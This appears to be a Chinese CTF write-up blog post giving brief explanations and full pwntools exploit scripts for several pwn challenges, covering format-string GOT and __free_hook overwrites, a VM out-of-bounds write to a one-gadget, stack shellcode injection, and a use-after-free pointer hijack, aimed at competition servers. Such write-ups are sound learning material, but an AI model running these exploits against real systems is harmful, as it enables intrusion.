总的来说,我个人对这四场比赛的评价就是简单的太简单,难得太难,直接难成cve。我裂开
青龙组
boom1:
这个就直接是个C的编译器。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| from PwnContext import *
from pwn import *
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = 'boom1'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
local=0
def choice():
if(local):
p=rs()
else:
ctx.remote = ('182.92.73.10',24573)
p=rs('remote')
return p
choice()
payload = '''
char *a;
char *b;
char *buf;
int main()
{
a = "whali3n51";
b = a - (0x7F8FE6E5C028 - 0x7F8FE6933000);
a = b + 0x5f0f48- 0xf08 + 8;
a[0] = 0;
a = b + 0x5f0f48;
buf = 0xCD0F3 + b;
a[0] = (buf)&0xFF;
a[1] = (buf>>8)&0xFF;
a[2] = (buf>>16)&0xFF;
printf("%p %p %p",b,buf,*(int *)a);
}'''
payload = payload.replace('\n','')
sl(payload)
irt()
|
boom2:
这个是一个简单的VM,数组能越界,然后拿到栈上的数据,通过加减法,让指针指向libc_start_main,然后在计算一下将调整一下值,让libc_start_main变成onegadget的值,然后写到libc_start_main的地方。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| from PwnContext import *
from pwn import *
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = 'boom2'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
local=0
def choice():
if(local):
p=rs()
else:
ctx.remote = ('182.92.73.10',36642)
p=rs('remote')
return p
def debug():
libc_base = ctx.bases.libc
print hex(libc_base)
ctx.symbols = {'sym1':0x920,'sym2':0xA3E}
ctx.breakpoints = [0x920,0xA3E]
ctx.debug()
payload=p64(1)+p64(0xffffffffffffff18)+p64(13)+p64(0)+p64(0xfffffffffffffffc)+p64(9)+p64(25)+p64(13)+p64(9)+p64(13)+p64(1)+p64(854295)+p64(25)+p64(11)
choice()
sa("code>",payload)
irt()
|
faster0:
这个kirin给了思路,但是我tcl,不会使用angr来爆破。无果,以后有时间学学angr吧,感觉用来盲打挺不错的。
白虎组
这一场很无语,一个cve,一个隐写附件,让人误导为没有附件,我无语,记录一下其他pwn吧。
pwn2:
很简单的思路,直接格式化字符串修改got表为调用system的地方
还有一种思路利用可以用%*X$d%Y$n来把栈中X处的值赋给栈中偏移Y处的指针指向的地址。利用这种方式,可以用来满足条件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| from PwnContext import *
from pwn import *
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = 'pwn2'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
local=1
def choice():
if(local):
p=rs()
else:
ctx.remote = ('123.57.225.26',15246)
p=rs('remote')
return p
def debug():
if(local==1):
libc_base = ctx.bases.libc
print hex(libc_base)
ctx.symbols = {'sym1':0x804876A}
ctx.breakpoints = [0x804876A]
ctx.debug()
choice()
sla("FirstName:",p32(0x804A028))
sa("LastName:","%35291c%20$hn")
irt()
|
pwn3:
sosososo easy的一题,他啥保护都没有开,直接eip劫持了,调用read,写入shellcode,然后控制eip,指向shellcode即可。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
| from PwnContext import *
from pwn import *
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = 'pwn3'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.arch='amd64'
ctx.debug_remote_libc = False
local=0
def catflag(i):
sl('ls')
sleep(1)
r()
sl("cat /flag*")
flag=r()
f.write("172.17.135."+ip[i]+' '+flag)
def choice():
if(local):
p=rs()
else:
ctx.remote = ('123.57.225.26',42435)
p=rs('remote')
return p
def debug():
if(local==1):
libc_base = ctx.bases.libc
print hex(libc_base)
ctx.symbols = {'sym1':0xEDA , 'sym2':0x10AF}
ctx.breakpoints = [0xEDA,0x10AF]
ctx.debug()
choice()
payload="1"*0x78+p64(0x00000000004006a3)+p64(0x601500)+p64(0x4004D0)+p64(0x601500)
sl(payload)
sl(asm(shellcraft.sh()))
irt()
|
朱雀组
format:
看似很复杂,其实很简单的格式化字符串利用,改写__free_hook,直接getshell。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
| from PwnContext import *
from pwn import *
from PwnContext import *
from LibcSearcher import *
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = 'format'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
local=1
def choice():
if(local):
p=rs()
else:
ctx.remote = ('59.110.243.101', 25413)
p=rs('remote')
return p
def debug():
if(local==1):
libc_base = ctx.bases.libc
print hex(libc_base)
ctx.symbols = {'sym1':0x0FB5}
ctx.breakpoints = [0x0FB5]
ctx.debug()
def menu(index):
sla(">",index)
def create(size):
menu(1)
sla("size: ",size)
def show(index):
menu(2)
sla("id: ",index)
def edit(index,content):
menu(3)
sla("id: ",index)
sa("content: ",content)
def free(index):
menu(4)
sla("id: ",index)
def exp(index):
print "exploition"
catflag(i)
choice()
debug()
menu("vim 2")
menu("%35$p")
menu("cat 2")
ru('0x')
libc_base=int(r(12),16)-(0x7ffff7a2d830-0x7ffff7a0d000)
leak("libc_base",libc_base)
system=libc_base+libc.symbols['system']
free_hook=libc_base+libc.symbols['__free_hook']
menu("vim 2")
menu("%"+str(system&0xffff)+"c%11$hn")
menu("cat 2aaa"+p64(free_hook))
menu("vim 2")
menu("%"+str((system>>16)&0xffff)+"c%11$hn")
menu("cat 2aaa"+p64(free_hook+2))
menu("vim 2")
menu("%"+str((system>>32)&0xffff)+"c%11$hn")
menu("cat 2aaa"+p64(free_hook+4))
menu("vim 1")
menu("/bin/sh\x00")
menu("rm 1")
irt()
|
pwn3:
UAF漏洞,直接劫持puts指针为后门函数地址就可以了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
| from PwnContext import *
from pwn import *
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = 'pwn3'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
local=1
def choice():
if(local):
p=rs()
else:
ctx.remote = ('59.110.243.101',54621)
p=rs('remote')
return p
def debug():
if(local==1):
libc_base = ctx.bases.libc
print hex(libc_base)
ctx.symbols = {'sym1':0xEDA , 'sym2':0x10AF}
ctx.breakpoints = [0xEDA,0x10AF]
ctx.debug()
def menu(index):
sla("Your choice :",index)
def create(size,content):
menu(1)
sla("magic cost ?:",size)
sa("name :",content)
def show(index):
menu(3)
sla("index :",index)
def free(index):
menu(2)
sla("index :",index)
choice()
create(0x10,"1231231")
create(0x20,"1232123")
free(0)
free(1)
create(0x10,p64(0x1231212)+p64(0x400A0D))
show(0)
irt()
|
玄武组
个人认为本组最难,因为考研要复习,这场没有打,而且应该全部是里通过angr盲打求解来解题,个人不会。
